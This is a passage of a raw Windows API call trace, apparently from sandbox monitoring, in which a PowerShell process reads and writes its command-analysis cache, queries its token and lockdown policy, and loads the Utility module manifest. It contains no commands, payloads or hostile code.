(lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6dc [0184.847] GetFileType (hFile=0x6dc) returned 0x1 [0184.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd970) returned 1 [0184.847] GetFileType (hFile=0x6dc) returned 0x1 [0184.847] ReadFile (in: hFile=0x6dc, lpBuffer=0x2738b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dd868, lpOverlapped=0x0 | out: lpBuffer=0x2738b58*, lpNumberOfBytesRead=0x1b7dd868*=0x8a2, lpOverlapped=0x0) returned 1 [0184.887] ReadFile (in: hFile=0x6dc, lpBuffer=0x2738b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dd838, lpOverlapped=0x0 | out: lpBuffer=0x2738b58*, lpNumberOfBytesRead=0x1b7dd838*=0x0, lpOverlapped=0x0) returned 1 [0184.887] CloseHandle (hObject=0x6dc) returned 1 [0184.887] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b2780 [0184.887] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9b2780 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0184.887] CoTaskMemFree (pv=0x1a9b2780) [0184.887] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7dd560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0184.887] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7dd700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0184.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb40) returned 1 [0184.888] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddc20 | out: lpFileInformation=0x1b7ddc20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0184.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb00) returned 1 [0184.888] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", nBufferLength=0x105, lpBuffer=0x1b7dd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", lpFilePart=0x0) returned 0x93 [0184.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dda80) returned 1 [0184.888] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_da21122d-ae44-4f93-ba1d-c9a978ca5b20"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6dc [0184.888] GetFileType (hFile=0x6dc) returned 0x1 [0184.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd9f0) returned 1 [0184.888] GetFileType (hFile=0x6dc) returned 0x1 [0184.889] SetEndOfFile (hFile=0x6dc) returned 1 [0184.889] WriteFile (in: hFile=0x6dc, lpBuffer=0x273d7f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1b7dd478, lpOverlapped=0x0 | out: lpBuffer=0x273d7f8*, lpNumberOfBytesWritten=0x1b7dd478*=0x1000, lpOverlapped=0x0) returned 1 [0184.891] WriteFile (in: hFile=0x6dc, lpBuffer=0x273d7f8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1b7dd478, lpOverlapped=0x0 | out: lpBuffer=0x273d7f8*, lpNumberOfBytesWritten=0x1b7dd478*=0x1000, lpOverlapped=0x0) returned 1 [0184.891] WriteFile (in: hFile=0x6dc, lpBuffer=0x273d7f8*, nNumberOfBytesToWrite=0xb07, lpNumberOfBytesWritten=0x1b7ddb98, lpOverlapped=0x0 | out: lpBuffer=0x273d7f8*, lpNumberOfBytesWritten=0x1b7ddb98*=0xb07, lpOverlapped=0x0) returned 1 [0184.892] CloseHandle (hObject=0x6dc) returned 1 [0184.893] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b2780 [0184.893] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9b2780 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0184.893] CoTaskMemFree (pv=0x1a9b2780) [0184.893] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7dd500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0184.893] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7dd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0184.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddae0) returned 1 [0184.893] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddbc0 | out: lpFileInformation=0x1b7ddbc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0184.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddaa0) returned 1 [0184.894] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b7dd540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0184.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dda20) returned 1 [0184.894] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6dc [0184.894] GetFileType (hFile=0x6dc) returned 0x1 [0184.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd990) returned 1 [0184.894] GetFileType (hFile=0x6dc) returned 0x1 [0184.894] SetEndOfFile (hFile=0x6dc) returned 1 [0184.900] WriteFile (in: hFile=0x6dc, lpBuffer=0x2742870*, nNumberOfBytesToWrite=0x8a2, lpNumberOfBytesWritten=0x1b7ddb38, lpOverlapped=0x0 | out: lpBuffer=0x2742870*, lpNumberOfBytesWritten=0x1b7ddb38*=0x8a2, lpOverlapped=0x0) returned 1 [0184.901] CloseHandle (hObject=0x6dc) returned 1 [0184.902] ReleaseMutex (hMutex=0x6d8) returned 1 [0186.535] EtwEventActivityIdControl () returned 0x0 [0186.539] SetEvent (hEvent=0x6c8) returned 1 [0186.539] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7de440*=0x6c8, lpdwindex=0x1b7de214 | out: lpdwindex=0x1b7de214) returned 0x0 [0186.542] GetCurrentProcess () returned 0xffffffffffffffff [0186.542] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7de6c8 | out: TokenHandle=0x1b7de6c8*=0x6dc) returned 1 [0186.542] GetTokenInformation (in: TokenHandle=0x6dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b7de7c8 | out: TokenInformation=0x0, ReturnLength=0x1b7de7c8) returned 0 [0186.542] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1a8842b0 [0186.542] GetTokenInformation (in: TokenHandle=0x6dc, TokenInformationClass=0x1, TokenInformation=0x1a8842b0, TokenInformationLength=0x2c, ReturnLength=0x1b7de7c8 | out: TokenInformation=0x1a8842b0, ReturnLength=0x1b7de7c8) returned 1 [0186.542] LocalFree (hMem=0x1a8842b0) returned 0x0 [0186.543] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x2755910, cbSid=0x1b7de7c0 | out: pSid=0x2755910*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x1b7de7c0) returned 1 [0186.543] CreateMutexW (lpMutexAttributes=0x2755a60, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x6e8 [0186.543] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7de660*=0x6e8, lpdwindex=0x1b7de434 | out: lpdwindex=0x1b7de434) returned 0x0 [0186.543] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7de1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0186.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5e0) returned 1 [0186.544] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7de6c0 | out: lpFileInformation=0x1b7de6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0186.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5a0) returned 1 [0186.544] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b7de040, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0186.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de520) returned 1 [0186.544] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6ec [0186.544] GetFileType (hFile=0x6ec) returned 0x1 [0186.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de490) returned 1 [0186.544] GetFileType (hFile=0x6ec) returned 0x1 [0186.544] ReadFile (in: hFile=0x6ec, lpBuffer=0x2756b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de388, lpOverlapped=0x0 | out: lpBuffer=0x2756b28*, lpNumberOfBytesRead=0x1b7de388*=0x8a2, lpOverlapped=0x0) returned 1 [0186.547] ReadFile (in: hFile=0x6ec, lpBuffer=0x2756b28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de358, lpOverlapped=0x0 | out: lpBuffer=0x2756b28*, lpNumberOfBytesRead=0x1b7de358*=0x0, lpOverlapped=0x0) returned 1 [0186.547] CloseHandle (hObject=0x6ec) returned 1 [0186.547] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7de330, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0186.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de7b0) returned 1 [0186.548] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x275a230 | out: lpFileInformation=0x275a230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0186.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de770) returned 1 [0186.548] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7de260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0186.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de6a0) returned 1 [0186.548] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7de780 | out: lpFileInformation=0x1b7de780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0186.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de660) returned 1 [0186.548] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", lpFilePart=0x0) returned 0x93 [0186.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5e0) returned 1 [0186.548] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_da21122d-ae44-4f93-ba1d-c9a978ca5b20"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6ec [0186.549] GetFileType (hFile=0x6ec) returned 0x1 [0186.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de550) returned 1 [0186.549] GetFileType (hFile=0x6ec) returned 0x1 [0186.549] ReadFile (in: hFile=0x6ec, lpBuffer=0x275b530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de448, lpOverlapped=0x0 | out: lpBuffer=0x275b530*, lpNumberOfBytesRead=0x1b7de448*=0x1000, lpOverlapped=0x0) returned 1 [0187.171] ReadFile (in: hFile=0x6ec, lpBuffer=0x275b530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de118, lpOverlapped=0x0 | out: lpBuffer=0x275b530*, lpNumberOfBytesRead=0x1b7de118*=0x1000, lpOverlapped=0x0) returned 1 [0187.172] ReadFile (in: hFile=0x6ec, lpBuffer=0x276fdad, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x1b7ddd78, lpOverlapped=0x0 | out: lpBuffer=0x276fdad*, lpNumberOfBytesRead=0x1b7ddd78*=0x5, lpOverlapped=0x0) returned 1 [0187.172] ReadFile (in: hFile=0x6ec, lpBuffer=0x275b530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7ddd78, lpOverlapped=0x0 | out: lpBuffer=0x275b530*, lpNumberOfBytesRead=0x1b7ddd78*=0xb02, lpOverlapped=0x0) returned 1 [0187.174] ReadFile (in: hFile=0x6ec, lpBuffer=0x275b530, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de418, lpOverlapped=0x0 | out: lpBuffer=0x275b530*, lpNumberOfBytesRead=0x1b7de418*=0x0, lpOverlapped=0x0) returned 1 [0187.174] CloseHandle (hObject=0x6ec) returned 1 [0187.174] ReleaseMutex (hMutex=0x6e8) returned 1 [0187.175] CoCreateGuid (in: pguid=0x1b7de878 | out: pguid=0x1b7de878*(Data1=0x55ff1b27, Data2=0x3f5a, Data3=0x455e, Data4=([0]=0x9e, [1]=0x9d, [2]=0x52, [3]=0xd0, [4]=0x65, [5]=0x62, [6]=0xf9, [7]=0x7f))) returned 0x0 [0187.175] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6ec [0187.175] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6f0 [0187.175] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6f4 [0187.175] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6b4 [0187.175] SetEvent (hEvent=0x6b4) returned 1 [0187.175] SetEvent (hEvent=0x6ec) returned 1 [0187.175] SetEvent (hEvent=0x6f0) returned 1 [0187.175] SetEvent (hEvent=0x6f4) returned 1 [0187.176] AmsiCloseSession () returned 0x7ffb1cb78068 [0187.176] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6f8 [0187.176] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.290] EtwEventActivityIdControl () returned 0x0 [0187.290] EtwEventActivityIdControl () returned 0x0 [0187.290] EtwEventActivityIdControl () returned 0x0 [0187.481] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0187.482] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7ddb20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddf60) returned 1 [0187.482] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de040 | out: lpFileInformation=0x1b7de040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0187.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddf20) returned 1 [0187.482] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0187.482] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd680, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.482] CoTaskMemAlloc (cb=0x20c) returned 0x1a9aff20 [0187.482] GetSystemDirectoryW (in: lpBuffer=0x1a9aff20, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0187.482] CoTaskMemFree (pv=0x1a9aff20) [0187.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7dd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0187.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7dd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0187.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd990) returned 1 [0187.482] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7dda70 | out: lpFileInformation=0x1b7dda70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0187.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd950) returned 1 [0187.483] WldpGetLockdownPolicy () returned 0x0 [0187.483] GetSystemInfo (in: lpSystemInfo=0x1b7ddad0 | out: lpSystemInfo=0x1b7ddad0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0187.483] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7dd9d8 | out: phkResult=0x1b7dd9d8*=0x6b8) returned 0x0 [0187.483] RegQueryValueExW (in: hKey=0x6b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7dda28, lpData=0x0, lpcbData=0x1b7dda20*=0x0 | out: lpType=0x1b7dda28*=0x0, lpData=0x0, lpcbData=0x1b7dda20*=0x0) returned 0x2 [0187.483] RegCloseKey (hKey=0x6b8) returned 0x0 [0187.484] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd8a0) returned 1 [0187.484] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6b8 [0187.484] GetFileType (hFile=0x6b8) returned 0x1 [0187.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd810) returned 1 [0187.484] GetFileType (hFile=0x6b8) returned 0x1 [0187.484] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dd858*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dd858*=0) returned 0x0 [0187.484] ReadFile (in: hFile=0x6b8, lpBuffer=0x221e180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dd8d8, 